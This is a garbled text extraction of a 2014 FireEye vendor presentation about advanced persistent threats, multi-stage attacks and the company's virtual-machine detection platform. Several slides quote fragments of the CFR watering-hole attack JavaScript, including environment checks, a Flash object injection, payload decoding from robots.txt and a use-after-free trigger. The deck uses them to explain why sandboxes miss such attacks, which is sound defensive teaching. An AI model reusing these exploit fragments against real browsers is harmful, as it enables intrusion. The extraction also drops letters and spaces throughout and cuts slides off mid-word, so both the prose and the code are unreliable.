Transcription
e
Agenda§ ThreatLandscapeDeepDive§ Alookinsidechallengesofdetec ontechnology§ TheFireEyePla orm§ FireEyePla orm:ACaseStudy19.února2014
CurrentStateofCyberSecurityCoordinated Persistent Threat ActorsDynamic, Polymorphic MalwareNEW THREAT LANDSCAPEMulti-Vector Attacks19.února2014Multi-Staged Attacks
Mul:- ‐StagedCyberA ackExploitExploitServerServer1. Exploitation of System2. Malware Executable Download3. Callbacks and Control EstablishedFile Share 2IPS4. Lateral SpreadFile Share 15. Data ExfiltrationExploit Detection is Critical All SubsequentStages can be Hidden or ObfuscatedCallbackServer
WhatIsAnExploit?Compromised webpagewith exploit objectExploit object can be inANY web page1.Exploit object renderedby vulnerable software19.února2014An exploit is NOT the same asthe malware executable file!2.Exploit injects code intorunning program memory3.Control transfers toexploit code
StructureofaMul:- ‐FlowAPTA ackExploit Server1EmbeddedExploit AltersEndpoint19.února2014
StructureofaMul:- ‐FlowAPTA ackExploit Server1EmbeddedExploit AltersEndpoint19.února2014Callback Server2Callback
StructureofaMul:- ‐FlowAPTA ackExploit Server1EmbeddedExploit AltersEndpoint19.února2014Callback wnloads
StructureofaMul:- ‐FlowAPTA ackExploit Server1EmbeddedExploit AltersEndpoint19.února2014Callback wnloadsCommand andControl Server4Callbackand dataexfiltration
StructureofaMul:- ‐FlowAPTA ackExploit Server1EmbeddedExploit AltersEndpoint19.února2014Callback wnloadsCommand andControl Server4Callbackand dataexfiltration
Mul:- ‐FlowStructureofAPTA acks(e.g.Opera:onAurora,Opera:onBeebus,CFR )1Exploit injects code inWeb erverExploit in compromised CallbackWeb pageEmbeddedExploit edMalwareEncryptedmalwaredownloadsCommand andControl ServerCallbackand dataexfiltration
Mul:- ‐VectorStructureofAPTA ackWeaponizedEmailwithZero- cktoinfec TTPtocommandandcontrolserverWeaponized EmailCallback(2011 Recruitment Plan.xls)Server119.února20142BackdoorC&C Server34
Tradi:onal“DefenseinDepth”isfailingThe New Breed of Attacks Evade Signature-Based DefensesAnti-SpamGatewaysIPS"Firewalls/NGFWSecure WebGatewaysDesktop AVTradi ac veapproachtodetectthreats19.února2014
Even“classic”sandboxesarenotenough CFRa ackIni alCheck(Language,Windows&Java)if(h! "zh- ‐cn"&&h! "en- ‐us"&&h! "zh- ‐tw"&&h! "ja"&&h! "ru"&&h! "ko"){loca on.href "about:blank";}
CFRa ackCheckforFirstTimeAccessvarnum DisplayInfo();if(num 1){loca on.href "about:blank";}
CFRa ackLoadtheFlashObjectdocument.body.innerHTML " objectclassid \"clsid:D27CDB6E- ‐AE6D- ‐11cf- ‐96B8- ‐444553540000\"width \"100%\"height \"100%\"id \"today\" paramname \"movie\"value \"today.swf\"/ paramname \"quality\"value \"high\"/ paramname \"bgcolor\"value \"#ffffff\"/ paramname \"allowScriptAccess\"value \"sameDomain\"/ paramname \"allowFullScreen\"value \"true\"/ /object iframesrc news.html /iframe ";
CFRa get','robots.txt', false);xmlhttp.send();var page xmlhttp.responseText;page page.replace(/jj/g,"%");code unescape(page);
CFRa j61jj72
CFRa 20jj69jj20jj3Cjj20jj61jj72DECODEvare0 null;vare1 null;vare2 null;vararrObject newArray(3000);varelmObject newArray(500);for(vari 0;i arrObject.length;i ){arrObject[i] me a");}for(vari 0;i arrObject.length;i 2){arrObject[i].className null;}CollectGarbage();for(vari 0;i elmObject.length;i ){elmObject[i] document.createElement('buVon');}for(vari 1;i arrObject.length;i 2){arrObject[i].className null;}CollectGarbage();try{loca on.href 'ms- ‐help://'}catch(e){}try{e0 document.getElementById("a");e1 document.getElementById("b");e2 pplyElement(e0);e2.outerText }catch(e){}CollectGarbage();for(vari 0;i 20;i ){arrObject[i].className a");}window.loca on /account");
CFRa ackGettheSHELLcodetoRUNSHELL CODEMaliciousFileCache
Sowhatareproblemstodetectthea ackbyclassicsandbox?§ FourObjectsareneededtoperformtheAVack§ � HTML/JavaScript–DownloadTXTfile§ TextFile–ExploitedtheVulnerability§ ImageFile–Dropper(GotDecoded)§ Arealltherepartofthesameflow?§ DefinitelyNOT
Sowhatareproblemstodetectthea ackbyclassicsandbox?§ CanIsendallthesefilestoasandboxforexecu on?§ § § § Today.swfNews.htmlRobots.txtImage.jpg§ Rathernot § and“JPG”File?
TheObjec:ve:“Con:nuousThreatProtec:on”Time to DetectTime to FixREALTIMEPreventTHEFT OFASSETS & IP19.února2014COST OFRESPONSEDISRUPTION TOBUSINESSREPUTATION RISK
VirtualMachine- ‐BasedModelofDetec:onVirtual Machine-BasedModel of DetectionFinds known/ unknowncyber-attacks in real timeacross all attack vectorsMVXPurpose-Built for SecurityHardened Security19.února2014
FireEyeTechnology:InsidetheMVXFireEye Hardened1 Hypervisor 2000 simultaneous executionsCustom hypervisor with built-in countermeasuresDesigned for threat analysisFireEye Hardened HypervisorHardware19.února2014Multi-flow analysis
FireEyeTechnology:InsidetheMVXFireEye Hardened1 Hypervisor2Massive cross matrix ofvirtual execution 2000 simultaneous executionsMultiple operating systemsMulti-flow analysisMultiple service packsMultiple applicationsMultiple application versionsCross-Matrix Virtual ExecutionFireEye Hardened HypervisorHardware19.února2014
FireEyeTechnology:InsidetheMVXFireEye Hardened1 Hypervisor2Massive cross matrix ofvirtual execution3Threat Protectionat Scale 2000 simultaneous executionsMulti-flow analysis 2000 simultaneous executionsMulti-flow analysis 2000 ExecutionEnvironmentsCross-Matrix Virtual ExecutionControlPlaneFireEye Hardened HypervisorHardware19.února2014
bjects/hour)MVX400000Phase 1Phase 2300000200000Line duce FalseNegativesHTML and JavaScript form 95% ofobjects to be scanned on the wire1M objects/hourAPT web attacks are nearly invisibleneedles in haystack of network traffic19.února2014Multi-flow virtual analysis
t ThreatPreventionPlatformEndpoint ThreatPreventionPlatformEndpoint 4AAAAAValidateAAAAAAAAAContain&Isolate
PlatformMobile ThreatPreventionEmail ThreatPreventionEmail ThreatEmailPreventionThreatSEGPreventionNetwork ThreatPreventionMVXDynamic ThreatIntelligenceEndpointHost ThreatAnti-virusPreventionIPS SWGContent ntionMDM19.února2014
FireEyePlaZorm:Workflow1FireEye NetworkPlatforms MonitorFlows forEventsSignature-less virtualexecution technologyMonitors for Targetedand Zero-day attacksMVX2FireEye NetworkPlatformsAlert FireEye HXOn Event19.února2014Multi-vector threatdefenseReal-time threatprotection OSChangeReport
FireEyePlaZorm:Workflow3FireEye HXValidatesEndpoints ForCompromiseReach EndpointsAnywhereUnderstand WhatHappened orporate HeadquartersAgent Anywhere AutomaticallyInvestigates Endpoints No Matter Where They Are19.února2014Detect Events inthe Past
FireEyePlaZorm:Workflow&4 ContainIsolateDeny attackersaccess to systemswith a single mouseclick while stillallowing OfficeHotelCoffeeShop19.února2014Corporate Headquarters
Summary Today’saVacksaremoreadvancedandsophis catedCompleteProtec onAgainstToday’sNewBreedofCyberAVacks Tradi onaldefensescan’tstopthem Real- ‐ me,integratedsignature- ‐lesspla ntaVackvectors TheFireEyecross- ‐enterprisepla ailThreatProtec onMobileThreatProtec onEndpointThreatProtec on
ye.com16.února2011
Threat Prevention FireEye'Product'PorZolio:'Powered'by'MVX' 19.'února201 4' Threat Analytics Platform Mobile Threat Email Threat Prevention Prevention SEG Dynamic Threat MVX Intelligence Host Anti-virus Endpoint Threat Prevention MDM Host Anti-virus